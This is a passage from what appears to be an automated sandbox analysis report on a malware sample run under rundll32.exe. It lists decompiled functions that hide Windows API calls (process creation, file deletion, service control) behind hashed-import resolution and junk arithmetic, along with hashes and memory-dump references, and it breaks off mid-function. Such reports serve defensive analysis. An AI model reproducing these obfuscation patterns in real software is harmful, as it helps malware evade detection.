                                                      • Instruction Fuzzy Hash: F1015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001D4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E001D4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E001E07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                                      0x001d485e
                                                      0x001d487a
                                                      0x001d487d
                                                      0x001d4884
                                                      0x001d488b
                                                      0x001d4892
                                                      0x001d489d
                                                      0x001d48a0
                                                      0x001d48ad
                                                      0x001d48b7

                                                      APIs
                                                      • ExitProcess.KERNELBASE(00000000), ref: 001D48B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: [
                                                      • API String ID: 621844428-1822564810
                                                      • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction ID: 4d233150a7b1b8d0ca9ed02e51ebcc8e11366db29454cee23ee02343d5930ca8
                                                      • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction Fuzzy Hash: A0F017B0E05209FBDB04CFE8CA5699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001E4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 66%
                                                      			E001E4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001E07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                                      0x001e4f80
                                                      0x001e4f81
                                                      0x001e4f82
                                                      0x001e4f86
                                                      0x001e4f87
                                                      0x001e4f8c
                                                      0x001e4fa5
                                                      0x001e4fa8
                                                      0x001e4faf
                                                      0x001e4fb6
                                                      0x001e4fc7
                                                      0x001e4fca
                                                      0x001e4fd7
                                                      0x001e4fe2
                                                      0x001e4fe7

                                                      APIs
                                                      • CloseHandle.KERNELBASE(003E66D8), ref: 001E4FE2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: {#lm
                                                      • API String ID: 2962429428-1564096886
                                                      • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction ID: 6704b2815e5b6340f86946b0b895de4bfb083cb0925a4a1645cfd3f49927c494
                                                      • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction Fuzzy Hash: 50F037B0C1120CFFDB04DFA4D98289EBFBAEB44300F208199E804AB250D3715B509B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001E976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 21%
                                                      			E001E976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001D602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E001E07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                                      0x001e9772
                                                      0x001e9773
                                                      0x001e9778
                                                      0x001e977a
                                                      0x001e977b
                                                      0x001e977e
                                                      0x001e977f
                                                      0x001e9782
                                                      0x001e9785
                                                      0x001e9788
                                                      0x001e9789
                                                      0x001e978c
                                                      0x001e978f
                                                      0x001e9790
                                                      0x001e9791
                                                      0x001e9794
                                                      0x001e9797
                                                      0x001e979a
                                                      0x001e979d
                                                      0x001e97a0
                                                      0x001e97a3
                                                      0x001e97a6
                                                      0x001e97a7
                                                      0x001e97a8
                                                      0x001e97ad
                                                      0x001e97b7
                                                      0x001e97c3
                                                      0x001e97ca
                                                      0x001e97d1
                                                      0x001e97d8
                                                      0x001e97df
                                                      0x001e97e3
                                                      0x001e97fc
                                                      0x001e9816
                                                      0x001e981d

                                                      APIs
                                                      • CreateProcessW.KERNEL32(001D591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001D591A), ref: 001E9816
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction ID: c55db46f124b2cc675f9668ff90ed3c07b71415c0d78f6d611415f865274e5c6
                                                      • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction Fuzzy Hash: 0C11B372901188BFDF1A9FD6DC0ACDF7F7AEF89750F104148FA1556120D2728AA0EBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001DB566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 31%
                                                      			E001DB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001D602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E001E07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                                      0x001db569
                                                      0x001db56a
                                                      0x001db56d
                                                      0x001db572
                                                      0x001db574
                                                      0x001db577
                                                      0x001db57a
                                                      0x001db57d
                                                      0x001db580
                                                      0x001db583
                                                      0x001db586
                                                      0x001db587
                                                      0x001db58a
                                                      0x001db58d
                                                      0x001db590
                                                      0x001db593
                                                      0x001db594
                                                      0x001db595
                                                      0x001db59a
                                                      0x001db5a4
                                                      0x001db5b8
                                                      0x001db5c0
                                                      0x001db5c4
                                                      0x001db5cb
                                                      0x001db5d2
                                                      0x001db5d9
                                                      0x001db5e6
                                                      0x001db5fd
                                                      0x001db604

                                                      APIs
                                                      • CreateFileW.KERNELBASE(001E0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001E0668,?,?,?,?), ref: 001DB5FD
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction ID: 37c1b1c4d25d484248efe105347f02daa2207a1a560edb8fe11a26f7b2631849
                                                      • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction Fuzzy Hash: 0611C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A60EB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001E981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E001E981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001D602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E001E07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                                      0x001e9821
                                                      0x001e9822
                                                      0x001e9825
                                                      0x001e9828
                                                      0x001e982a
                                                      0x001e982c
                                                      0x001e982f
                                                      0x001e9832
                                                      0x001e9835
                                                      0x001e9836
                                                      0x001e9837
                                                      0x001e983c
                                                      0x001e9855
                                                      0x001e9858
                                                      0x001e985f
                                                      0x001e9866
                                                      0x001e986d
                                                      0x001e9874
                                                      0x001e987b
                                                      0x001e988e
                                                      0x001e989b
                                                      0x001e98a2

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001D87F2,0000CAAE,0000510C,AD82F196), ref: 001E989B
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction ID: b7709b50ae51164d8aeb1307988349b9148569f66681926d56ec9366ccc2218f
                                                      • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction Fuzzy Hash: BA019A72801208FBDB04EFD5D846CDFBF79EF85310F108189F908A6220E6715B619BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001E7BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E001E7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E001E07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                                      0x001e7bf7
                                                      0x001e7bf8
                                                      0x001e7bfa
                                                      0x001e7bfd
                                                      0x001e7bff
                                                      0x001e7c02
                                                      0x001e7c06
                                                      0x001e7c07
                                                      0x001e7c0f
                                                      0x001e7c1d
                                                      0x001e7c25
                                                      0x001e7c2d
                                                      0x001e7c31
                                                      0x001e7c38
                                                      0x001e7c3f
                                                      0x001e7c46
                                                      0x001e7c4a
                                                      0x001e7c5e
                                                      0x001e7c67
                                                      0x001e7c6d

                                                      APIs
                                                      • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001E7C67
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileOperation
                                                      • String ID:
                                                      • API String ID: 3080627654-0
                                                      • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction ID: e7037390f7e7bacdf7c2bd971d6ce7ccbf9953c3af2e8e0c38516eaa01a5caa6
                                                      • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction Fuzzy Hash: 28014BB190120CFFEB09DFA4C84A8DEBBB9EF54314F208199F405A7240EBB15F509B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001DF65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 52%
                                                      			E001DF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E001E07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                                      0x001df662
                                                      0x001df663
                                                      0x001df665
                                                      0x001df668
                                                      0x001df66a
                                                      0x001df66d
                                                      0x001df670
                                                      0x001df673
                                                      0x001df677
                                                      0x001df678
                                                      0x001df67d
                                                      0x001df687
                                                      0x001df693
                                                      0x001df69a
                                                      0x001df6a1
                                                      0x001df6a5
                                                      0x001df6a9
                                                      0x001df6b0
                                                      0x001df6c9
                                                      0x001df6d8
                                                      0x001df6de

                                                      APIs
                                                      • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001DF6D8
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: OpenService
                                                      • String ID:
                                                      • API String ID: 3098006287-0
                                                      • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction ID: 25db9c83cd685e5ff74837f7b26bcfb941d860824d8c17e223a5a90ae44bee76
                                                      • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction Fuzzy Hash: 7F01E5B6901208BFEF059F94DC468DF7F75EB19324F148188F90462250D7B25E61DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001DB6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E001DB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E001D602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E001E07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                                      0x001db6f3
                                                      0x001db6f8
                                                      0x001db702
                                                      0x001db70b
                                                      0x001db712
                                                      0x001db719
                                                      0x001db720
                                                      0x001db727
                                                      0x001db72e
                                                      0x001db747
                                                      0x001db759
                                                      0x001db75e

                                                      APIs
                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001DB759
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileHandleInformation
                                                      • String ID:
                                                      • API String ID: 3935143524-0
                                                      • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction ID: 4e94c54c4c2e972598a0f63784df660732168030f90fb273d613f908c69640ee
                                                      • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction Fuzzy Hash: DF0128B6941308FBEB45DF94DD06A9E7BB5EB18704F108188FA09661A0D3B25E20AB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001EAA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E001EAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E001E07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                                      0x001eaa3f
                                                      0x001eaa40
                                                      0x001eaa41
                                                      0x001eaa44
                                                      0x001eaa47
                                                      0x001eaa4b
                                                      0x001eaa4c
                                                      0x001eaa51
                                                      0x001eaa5b
                                                      0x001eaa64
                                                      0x001eaa68
                                                      0x001eaa6f
                                                      0x001eaa76
                                                      0x001eaa8d
                                                      0x001eaa90
                                                      0x001eaa9d
                                                      0x001eaaa8
                                                      0x001eaaad

                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001EAAA8
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction ID: 6cc9e9da56f875ccb929634986dd8fabee2daaccf13b632fb616f58897090f90
                                                      • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction Fuzzy Hash: 20F019B590020CFFDF08DF94DD4A99EBFB5EB45304F108198F915A6250D3B69F549B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 001D5FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E001D5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001E07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                                      0x001d5fb5
                                                      0x001d5fb6
                                                      0x001d5fb7
                                                      0x001d5fbb
                                                      0x001d5fbc
                                                      0x001d5fc1
                                                      0x001d5fcb
                                                      0x001d5fd7
                                                      0x001d5fde
                                                      0x001d5fe5
                                                      0x001d5ffc
                                                      0x001d5fff
                                                      0x001d6006
                                                      0x001d600d
                                                      0x001d601a
                                                      0x001d6025
                                                      0x001d602a

                                                      APIs
                                                      • CloseServiceHandle.ADVAPI32(39CCF342), ref: 001D6025
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID:
                                                      • API String ID: 1725840886-0
                                                      • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction ID: 21e3675d678c7d47ccde82411a3224adeb747ad6c423f1aa475c33c6d4e2ced6
                                                      • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction Fuzzy Hash: 7DF04FB0C11208FFDB08DFA0E94689EBFB8EB54300F208198E409A7260E7B15F559F54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: rundll32.exe PID: 2488 Parent PID: 2932 rundll32.exeCOMMON

                                                      Executed Functions

                                                      Function 00272959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E00272959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0027602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002807A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                                      0x0027295f
                                                      0x00272964
                                                      0x00272967
                                                      0x0027296a
                                                      0x0027296d
                                                      0x0027296e
                                                      0x0027296f
                                                      0x00272977
                                                      0x00272985
                                                      0x0027298a
                                                      0x00272992
                                                      0x0027299a
                                                      0x002729a2
                                                      0x002729a9
                                                      0x002729b0
                                                      0x002729b7
                                                      0x002729bb
                                                      0x002729cf
                                                      0x002729dc
                                                      0x002729e2

                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002729DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ManagerOpen
                                                      • String ID: <^
                                                      • API String ID: 1889721586-3203995635
                                                      • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction ID: 23d533029c3056aabe95aed0a0a9b438db4a3eeeeaaebe737ea5bdb30237e692
                                                      • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction Fuzzy Hash: A8016D72A01108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0027C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E0027C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0027602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
